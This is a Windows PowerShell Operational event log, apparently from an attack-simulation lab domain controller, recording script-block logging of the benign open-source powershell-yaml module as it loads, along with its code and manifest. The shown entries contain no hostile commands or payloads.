SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469337
Keywords=None
Message=Completed invocation of ScriptBlock ID: a85bed97-9bbb-4097-beff-9d8cef80286e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469374
Keywords=None
Message=Completed invocation of ScriptBlock ID: 41a17d9d-9df5-4718-a2c2-1ded2d9fa938
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4103
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Executing Pipeline
OpCode=To be used when operation is just executing a method
RecordNumber=1469373
Keywords=None
Message=CommandInvocation(Add-Type): "Add-Type"
ParameterBinding(Add-Type): name="TypeDefinition"; value="using System;
using System.Text.RegularExpressions;
using YamlDotNet;
using YamlDotNet.Core;
using YamlDotNet.Serialization;
using YamlDotNet.Serialization.EventEmitters;
public class StringQuotingEmitter: ChainedEventEmitter {
    // Patterns from https://yaml.org/spec/1.2/spec.html#id2804356
    private static Regex quotedRegex = new Regex(@"^(\~|null|true|false|-?(0|[0-9][0-9]*)(\.[0-9]*)?([eE][-+]?[0-9]+)?)?$", RegexOptions.Compiled);
    public StringQuotingEmitter(IEventEmitter next): base(next) {}

    public override void Emit(ScalarEventInfo eventInfo, IEmitter emitter) {
        var typeCode = eventInfo.Source.Value != null
        ? Type.GetTypeCode(eventInfo.Source.Type)
        : TypeCode.Empty;

        switch (typeCode) {
            case TypeCode.Char:
                if (Char.IsDigit((char)eventInfo.Source.Value)) {
                    eventInfo.Style = ScalarStyle.DoubleQuoted;
                }
                break;
            case TypeCode.String:
                var val = eventInfo.Source.Value.ToString();
                if (quotedRegex.IsMatch(val))
                {
                    eventInfo.Style = ScalarStyle.DoubleQuoted;
                } else if (val.IndexOf('\n') > -1) {
                    eventInfo.Style = ScalarStyle.Literal;
                }
                break;
        }

        base.Emit(eventInfo, emitter);
    }

    public static SerializerBuilder Add(SerializerBuilder builder) {
        return builder.WithEventEmitter(next => new StringQuotingEmitter(next));
    }
}"
ParameterBinding(Add-Type): name="ReferencedAssemblies"; value="C:\Users\Administrator\Documents\WindowsPowerShell\Modules\powershell-yaml\0.4.2\lib\net45\YamlDotNet.dll, C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll"
ParameterBinding(Add-Type): name="Language"; value="CSharp"


Context:
        Severity = Informational
        Host Name = ConsoleHost
        Host Version = 5.1.14393.4402
        Host ID = b0030b64-c114-4765-a95a-dacf53f2747d
        Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Engine Version = 5.1.14393.4402
        Runspace ID = c5f1100c-56fc-4347-871f-80d397213539
        Pipeline ID = 23
        Command Name = Add-Type
        Command Type = Cmdlet
        Script Name = C:\Users\Administrator\Documents\WindowsPowerShell\Modules\powershell-yaml\0.4.2\powershell-yaml.psm1
        Command Path = 
        Sequence Number = 62
        User = ATTACKRANGE\administrator
        Connected User = 
        Shell ID = Microsoft.PowerShell


User Data:
06/15/2021 05:01:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469372
Keywords=None
Message=Completed invocation of ScriptBlock ID: a81fea89-2a48-4f7b-8555-dcfece0367bb
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469371
Keywords=None
Message=Completed invocation of ScriptBlock ID: a6caceea-8446-4eb7-abae-4a901318fa07
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469370
Keywords=None
Message=Started invocation of ScriptBlock ID: a6caceea-8446-4eb7-abae-4a901318fa07
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469369
Keywords=None
Message=Started invocation of ScriptBlock ID: a81fea89-2a48-4f7b-8555-dcfece0367bb
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469368
Keywords=None
Message=Started invocation of ScriptBlock ID: 41a17d9d-9df5-4718-a2c2-1ded2d9fa938
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=3
Type=Warning
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1469367
Keywords=None
Message=Creating Scriptblock text (1 of 1):
# Copyright 2016 Cloudbase Solutions Srl
#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.
#

$here = Split-Path -Parent $MyInvocation.MyCommand.Path
$assemblies = Join-Path $here "Load-Assemblies.ps1"

if (Test-Path $assemblies) {
    . $here\Load-Assemblies.ps1
}

function Get-YamlDocuments {
    [CmdletBinding()]
    Param(
        [Parameter(Mandatory=$true, ValueFromPipeline=$true)]
        [string]$Yaml,
        [switch]$UseMergingParser=$false
    )
    PROCESS {
        $stringReader = new-object System.IO.StringReader($Yaml)
        $parser = New-Object "YamlDotNet.Core.Parser" $stringReader
        if($UseMergingParser) {
            $parser = New-Object "YamlDotNet.Core.MergingParser" $parser
        }

        $yamlStream = New-Object "YamlDotNet.RepresentationModel.YamlStream"
        $yamlStream.Load([YamlDotNet.Core.IParser] $parser)

        $stringReader.Close()

        return $yamlStream
    }
}

function Convert-ValueToProperType {
    [CmdletBinding()]
    Param(
        [Parameter(Mandatory=$true,ValueFromPipeline=$true)]
        [System.Object]$Node
    )
    PROCESS {
        if (!($Node.Value -is [string])) {
            return $Node
        }
        
        if ($Node.Style -eq 'Plain')
        {
            $types = @([int], [long], [double], [boolean], [decimal])
            foreach($i in $types){
                $parsedValue = New-Object -TypeName $i.FullName
                if ($i.IsAssignableFrom([boolean])){
                    $result = $i::TryParse($Node,[ref]$parsedValue) 
                } else {
                    $result = $i::TryParse($Node, [Globalization.NumberStyles]::Any, [Globalization.CultureInfo]::InvariantCulture, [ref]$parsedValue)
                }
                if( $result ) {
                    return $parsedValue
                }
            }
        }
        # From the YAML spec: http://yaml.org/type/timestamp.html
        $regex = @'
[0-9][0-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9] # (ymd)
|[0-9][0-9][0-9][0-9] # (year)
 -[0-9][0-9]? # (month)
 -[0-9][0-9]? # (day)
 ([Tt]|[ \t]+)[0-9][0-9]? # (hour)
 :[0-9][0-9] # (minute)
 :[0-9][0-9] # (second)
 (\.[0-9]*)? # (fraction)
 (([ \t]*)Z|[-+][0-9][0-9]?(:[0-9][0-9])?)? # (time zone)
'@
        if([Text.RegularExpressions.Regex]::IsMatch($Node.Value, $regex, [Text.RegularExpressions.RegexOptions]::IgnorePatternWhitespace) ) {
            [DateTime]$datetime = [DateTime]::MinValue
            if( ([DateTime]::TryParse($Node.Value,[ref]$datetime)) ) {
                return $datetime
            }
        }

        if ($Node.Style -eq 'Plain' -and $Node.Value -in '','~','null','Null','NULL') {
            return $null
        }

        return $Node.Value
    }
}

function Convert-YamlMappingToHashtable {
    [CmdletBinding()]
    Param(
        [Parameter(Mandatory=$true, ValueFromPipeline=$true)]
        [YamlDotNet.RepresentationModel.YamlMappingNode]$Node,
        [switch] $Ordered
    )
    PROCESS {
        if ($Ordered) { $ret = [ordered]@{} } else { $ret = @{} }
        foreach($i in $Node.Children.Keys) {
            $ret[$i.Value] = Convert-YamlDocumentToPSObject $Node.Children[$i] -Ordered:$Ordered
        }
        return $ret
    }
}

function Convert-YamlSequenceToArray {
    [CmdletBinding()]
    Param(
        [Parameter(Mandatory=$true, ValueFromPipeline=$true)]
        [YamlDotNet.RepresentationModel.YamlSequenceNode]$Node,
        [switch]$Ordered
    )
    PROCESS {
        $ret = [System.Collections.Generic.List[object]](New-Object "System.Collections.Generic.List[object]")
        foreach($i in $Node.Children){
            $ret.Add((Convert-YamlDocumentToPSObject $i -Ordered:$Ordered))
        }
        return ,$ret
    }
}

function Convert-YamlDocumentToPSObject {
    [CmdletBinding()]
    Param(
        [Parameter(Mandatory=$true, ValueFromPipeline=$true)]
        [System.Object]$Node, 
        [switch]$Ordered
    )
    PROCESS {
        switch($Node.GetType().FullName){
            "YamlDotNet.RepresentationModel.YamlMappingNode"{
                return Convert-YamlMappingToHashtable $Node -Ordered:$Ordered
            }
            "YamlDotNet.RepresentationModel.YamlSequenceNode" {
                return Convert-YamlSequenceToArray $Node -Ordered:$Ordered
            }
            "YamlDotNet.RepresentationModel.YamlScalarNode" {
                return (Convert-ValueToProperType $Node)
            }
        }
    }
}

function Convert-HashtableToDictionary {
    Param(
        [Parameter(Mandatory=$true,ValueFromPipeline=$true)]
        [hashtable]$Data
    )
    foreach($i in $($data.Keys)) {
        $Data[$i] = Convert-PSObjectToGenericObject $Data[$i]
    }
    return $Data
}

function Convert-OrderedHashtableToDictionary {
    Param(
        [Parameter(Mandatory=$true,ValueFromPipeline=$true)]
        [System.Collections.Specialized.OrderedDictionary] $Data
    )
    foreach ($i in $($data.Keys)) {
        $Data[$i] = Convert-PSObjectToGenericObject $Data[$i]
    }
    return $Data
}

function Convert-ListToGenericList {
    Param(
        [Parameter(Mandatory=$false,ValueFromPipeline=$true)]
        [array]$Data=@()
    )
    $ret = [System.Collections.Generic.List[object]](New-Object "System.Collections.Generic.List[object]")
    for($i=0; $i -lt $Data.Count; $i++) {
        $ret.Add((Convert-PSObjectToGenericObject $Data[$i]))
    }
    return ,$ret
}

function Convert-PSCustomObjectToDictionary {
    Param(
        [Parameter(Mandatory=$true,ValueFromPipeline=$true)]
        [PSCustomObject]$Data
    )
    $ret = [System.Collections.Generic.Dictionary[string,object]](New-Object 'System.Collections.Generic.Dictionary[string,object]')
    foreach ($i in $Data.psobject.properties) {
        $ret[$i.Name] = Convert-PSObjectToGenericObject $i.Value
    }
    return $ret
}

function Convert-PSObjectToGenericObject {
    Param(
        [Parameter(Mandatory=$false,ValueFromPipeline=$true)]
        [System.Object]$Data
    )

    if ($null -eq $data) {
        return $data
    }

    $dataType = $data.GetType()
    if ($data -isnot [System.Object]) {
        return $data -as $dataType
    }

    if ($dataType.FullName -eq "System.Management.Automation.PSCustomObject") {
        return Convert-PSCustomObjectToDictionary $data
    } elseif (([System.Collections.Specialized.OrderedDictionary].IsAssignableFrom($dataType))){
        return Convert-OrderedHashtableToDictionary $data
    } elseif (([System.Collections.IDictionary].IsAssignableFrom($dataType))){
        return Convert-HashtableToDictionary $data
    } elseif (([System.Collections.IList].IsAssignableFrom($dataType))) {
        return Convert-ListToGenericList $data
    }
    return $data -as $dataType
}

function ConvertFrom-Yaml {
    [CmdletBinding()]
    Param(
        [Parameter(Mandatory=$false, ValueFromPipeline=$true, Position=0)]
        [string]$Yaml,
        [switch]$AllDocuments=$false,
        [switch]$Ordered,
        [switch]$UseMergingParser=$false
    )

    BEGIN {
        $d = ""
    }
    PROCESS {
        if($Yaml -is [string]) {
            $d += $Yaml + "`n"
        }
    }

    END {
        if($d -eq ""){
            return
        }
        $documents = Get-YamlDocuments -Yaml $d -UseMergingParser:$UseMergingParser
        if (!$documents.Count) {
            return
        }
        if($documents.Count -eq 1){
            return Convert-YamlDocumentToPSObject $documents[0].RootNode -Ordered:$Ordered
        }
        if(!$AllDocuments) {
            return Convert-YamlDocumentToPSObject $documents[0].RootNode -Ordered:$Ordered
        }
        $ret = @()
        foreach($i in $documents) {
            $ret += Convert-YamlDocumentToPSObject $i.RootNode -Ordered:$Ordered
        }
        return $ret
    }
}

$stringQuotingEmitterSource = @"
using System;
using System.Text.RegularExpressions;
using YamlDotNet;
using YamlDotNet.Core;
using YamlDotNet.Serialization;
using YamlDotNet.Serialization.EventEmitters;
public class StringQuotingEmitter: ChainedEventEmitter {
    // Patterns from https://yaml.org/spec/1.2/spec.html#id2804356
    private static Regex quotedRegex = new Regex(@`"^(\~|null|true|false|-?(0|[0-9][0-9]*)(\.[0-9]*)?([eE][-+]?[0-9]+)?)?$`", RegexOptions.Compiled);
    public StringQuotingEmitter(IEventEmitter next): base(next) {}

    public override void Emit(ScalarEventInfo eventInfo, IEmitter emitter) {
        var typeCode = eventInfo.Source.Value != null
        ? Type.GetTypeCode(eventInfo.Source.Type)
        : TypeCode.Empty;

        switch (typeCode) {
            case TypeCode.Char:
                if (Char.IsDigit((char)eventInfo.Source.Value)) {
                    eventInfo.Style = ScalarStyle.DoubleQuoted;
                }
                break;
            case TypeCode.String:
                var val = eventInfo.Source.Value.ToString();
                if (quotedRegex.IsMatch(val))
                {
                    eventInfo.Style = ScalarStyle.DoubleQuoted;
                } else if (val.IndexOf('\n') > -1) {
                    eventInfo.Style = ScalarStyle.Literal;
                }
                break;
        }

        base.Emit(eventInfo, emitter);
    }

    public static SerializerBuilder Add(SerializerBuilder builder) {
        return builder.WithEventEmitter(next => new StringQuotingEmitter(next));
    }
}
"@

$referenceList = @([YamlDotNet.Serialization.Serializer].Assembly.Location,[Text.RegularExpressions.Regex].Assembly.Location)
if ($PSVersionTable.PSEdition -eq "Core") {
    Add-Type -TypeDefinition $stringQuotingEmitterSource -ReferencedAssemblies $referenceList -Language CSharp -CompilerOptions "-nowarn:1701"
} else {
    Add-Type -TypeDefinition $stringQuotingEmitterSource -ReferencedAssemblies $referenceList -Language CSharp
}

function Get-Serializer {
    Param(
        [Parameter(Mandatory=$true)][YamlDotNet.Serialization.SerializationOptions]$Options
    )
    
    $builder = New-Object "YamlDotNet.Serialization.SerializerBuilder"
    
    if ($Options.HasFlag([YamlDotNet.Serialization.SerializationOptions]::Roundtrip)) {
        $builder = $builder.EnsureRoundtrip()
    }
    if ($Options.HasFlag([YamlDotNet.Serialization.SerializationOptions]::DisableAliases)) {
        $builder = $builder.DisableAliases()
    }
    if ($Options.HasFlag([YamlDotNet.Serialization.SerializationOptions]::EmitDefaults)) {
        $builder = $builder.EmitDefaults()
    }
    if ($Options.HasFlag([YamlDotNet.Serialization.SerializationOptions]::JsonCompatible)) {
        $builder = $builder.JsonCompatible()
    }
    if ($Options.HasFlag([YamlDotNet.Serialization.SerializationOptions]::DefaultToStaticType)) {
        $builder = $builder.WithTypeResolver((New-Object "YamlDotNet.Serialization.TypeResolvers.StaticTypeResolver"))
    }
    $builder = [StringQuotingEmitter]::Add($builder)
    return $builder.Build()
}

function ConvertTo-Yaml {
    [CmdletBinding(DefaultParameterSetName = 'NoOptions')]
    Param(
        [Parameter(ValueFromPipeline = $true, Position=0)]
        [System.Object]$Data,

        [string]$OutFile,

        [Parameter(ParameterSetName = 'Options')]
        [YamlDotNet.Serialization.SerializationOptions]$Options = [YamlDotNet.Serialization.SerializationOptions]::Roundtrip,

        [Parameter(ParameterSetName = 'NoOptions')]
        [switch]$JsonCompatible,

        [switch]$Force
    )
    BEGIN {
        $d = [System.Collections.Generic.List[object]](New-Object "System.Collections.Generic.List[object]")
    }
    PROCESS {
        if($data -is [System.Object]) {
            $d.Add($data)
        }
    }
    END {
        if ($d -eq $null -or $d.Count -eq 0) {
            return
        }
        if ($d.Count -eq 1) {
            $d = $d[0]
        }
        $norm = Convert-PSObjectToGenericObject $d
        if ($OutFile) {
            $parent = Split-Path $OutFile
            if (!(Test-Path $parent)) {
                Throw "Parent folder for specified path does not exist"
            }
            if ((Test-Path $OutFile) -and !$Force) {
                Throw "Target file already exists. Use -Force to overwrite."
            }
            $wrt = New-Object "System.IO.StreamWriter" $OutFile
        } else {
            $wrt = New-Object "System.IO.StringWriter"
        }
    
        if ($PSCmdlet.ParameterSetName -eq 'NoOptions') {
            $Options = 0
            if ($JsonCompatible) {
                # No indent options :~(
                $Options = [YamlDotNet.Serialization.SerializationOptions]::JsonCompatible
            }
        }

        try {
            $serializer = Get-Serializer $Options
            $serializer.Serialize($wrt, $norm)
        }
        catch{
            $_
        }
        finally {
            $wrt.Close()
        }
        if ($OutFile) {
            return
        } else {
            return $wrt.ToString()
        }
    }
}

New-Alias -Name cfy -Value ConvertFrom-Yaml
New-Alias -Name cty -Value ConvertTo-Yaml

Export-ModuleMember -Function * -Alias *


ScriptBlock ID: 41a17d9d-9df5-4718-a2c2-1ded2d9fa938
Path: C:\Users\Administrator\Documents\WindowsPowerShell\Modules\powershell-yaml\0.4.2\powershell-yaml.psm1
06/15/2021 05:01:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469366
Keywords=None
Message=Completed invocation of ScriptBlock ID: a81fea89-2a48-4f7b-8555-dcfece0367bb
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469365
Keywords=None
Message=Completed invocation of ScriptBlock ID: a6caceea-8446-4eb7-abae-4a901318fa07
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469364
Keywords=None
Message=Completed invocation of ScriptBlock ID: 11dc3648-7159-41b7-822e-471d9745f6e7
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469363
Keywords=None
Message=Started invocation of ScriptBlock ID: 11dc3648-7159-41b7-822e-471d9745f6e7
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1469362
Keywords=None
Message=Creating Scriptblock text (1 of 1):
function Load-Assembly {
    $libDir = Join-Path $here "lib"
    $assemblies = @{
        "core" = Join-Path $libDir "netstandard1.3\YamlDotNet.dll";
        "net45" = Join-Path $libDir "net45\YamlDotNet.dll";
        "net35" = Join-Path $libDir "net35\YamlDotNet.dll";
    }

    if ($PSVersionTable.PSEdition -eq "Core") {
        return [Reflection.Assembly]::LoadFrom($assemblies["core"])
    } elseif ($PSVersionTable.PSVersion.Major -ge 4) {
        return [Reflection.Assembly]::LoadFrom($assemblies["net45"])
    } else {
        return [Reflection.Assembly]::LoadFrom($assemblies["net35"])
    }
}

ScriptBlock ID: 11dc3648-7159-41b7-822e-471d9745f6e7
Path: C:\Users\Administrator\Documents\WindowsPowerShell\Modules\powershell-yaml\0.4.2\Load-Assemblies.ps1
06/15/2021 05:01:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469361
Keywords=None
Message=Started invocation of ScriptBlock ID: a6caceea-8446-4eb7-abae-4a901318fa07
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1469360
Keywords=None
Message=Creating Scriptblock text (1 of 1):
function Initialize-Assemblies {
    $requiredTypes = @(
        "Parser", "MergingParser", "YamlStream",
        "YamlMappingNode", "YamlSequenceNode",
        "YamlScalarNode", "ChainedEventEmitter",
        "Serializer", "Deserializer", "SerializerBuilder",
        "StaticTypeResolver"
    )

    $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match "YamlDotNet.dll"
    if (!$yaml) {
        return Load-Assembly
    }

    foreach ($i in $requiredTypes){
        if ($i -notin $yaml.DefinedTypes.Name) {
            Throw "YamlDotNet is loaded but missing required types ($i). Older version installed on system?"
        }
    }
}

ScriptBlock ID: a6caceea-8446-4eb7-abae-4a901318fa07
Path: C:\Users\Administrator\Documents\WindowsPowerShell\Modules\powershell-yaml\0.4.2\Load-Assemblies.ps1
06/15/2021 05:01:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469359
Keywords=None
Message=Started invocation of ScriptBlock ID: a81fea89-2a48-4f7b-8555-dcfece0367bb
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=3
Type=Warning
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1469358
Keywords=None
Message=Creating Scriptblock text (1 of 1):
# Copyright 2016 Cloudbase Solutions Srl
#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.
#

$here = Split-Path -Parent $MyInvocation.MyCommand.Path

function Load-Assembly {
    $libDir = Join-Path $here "lib"
    $assemblies = @{
        "core" = Join-Path $libDir "netstandard1.3\YamlDotNet.dll";
        "net45" = Join-Path $libDir "net45\YamlDotNet.dll";
        "net35" = Join-Path $libDir "net35\YamlDotNet.dll";
    }

    if ($PSVersionTable.PSEdition -eq "Core") {
        return [Reflection.Assembly]::LoadFrom($assemblies["core"])
    } elseif ($PSVersionTable.PSVersion.Major -ge 4) {
        return [Reflection.Assembly]::LoadFrom($assemblies["net45"])
    } else {
        return [Reflection.Assembly]::LoadFrom($assemblies["net35"])
    }
}


function Initialize-Assemblies {
    $requiredTypes = @(
        "Parser", "MergingParser", "YamlStream",
        "YamlMappingNode", "YamlSequenceNode",
        "YamlScalarNode", "ChainedEventEmitter",
        "Serializer", "Deserializer", "SerializerBuilder",
        "StaticTypeResolver"
    )

    $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match "YamlDotNet.dll"
    if (!$yaml) {
        return Load-Assembly
    }

    foreach ($i in $requiredTypes){
        if ($i -notin $yaml.DefinedTypes.Name) {
            Throw "YamlDotNet is loaded but missing required types ($i). Older version installed on system?"
        }
    }
}

Initialize-Assemblies | Out-Null


ScriptBlock ID: a81fea89-2a48-4f7b-8555-dcfece0367bb
Path: C:\Users\Administrator\Documents\WindowsPowerShell\Modules\powershell-yaml\0.4.2\Load-Assemblies.ps1
06/15/2021 05:01:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469357
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9d46c083-501a-43f5-a689-3129841e3361
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469356
Keywords=None
Message=Started invocation of ScriptBlock ID: 9d46c083-501a-43f5-a689-3129841e3361
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1469355
Keywords=None
Message=Creating Scriptblock text (1 of 1):
# Copyright 2016 Cloudbase Solutions Srl
#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.
#
# Module manifest for module 'powershell-yaml'
#
# Generated by: Gabriel Adrian Samfira
#
# Generated on: 10/01/2016
#

@{

# Script module or binary module file associated with this manifest.
RootModule = 'powershell-yaml.psm1'

# Version number of this module.
ModuleVersion = '0.4.2'

# ID used to uniquely identify this module
GUID = '6a75a662-7f53-425a-9777-ee61284407da'

# Author of this module
Author = 'Gabriel Adrian Samfira','Alessandro Pilotti'

# Company or vendor of this module
CompanyName = 'Cloudbase Solutions SRL'

# Copyright statement for this module
Copyright = '(c) 2016 Cloudbase Solutions SRL. All rights reserved.'

# Description of the functionality provided by this module
Description = 'Powershell module for serializing and deserializing YAML'

# Minimum version of the Windows PowerShell engine required by this module
PowerShellVersion = '3.0'

# Script files (.ps1) that are run in the caller's environment prior to importing this module.
ScriptsToProcess = @("Load-Assemblies.ps1")

# Functions to export from this module
FunctionsToExport = "ConvertTo-Yaml","ConvertFrom-Yaml"

AliasesToExport = "cfy","cty"
}


ScriptBlock ID: 9d46c083-501a-43f5-a689-3129841e3361
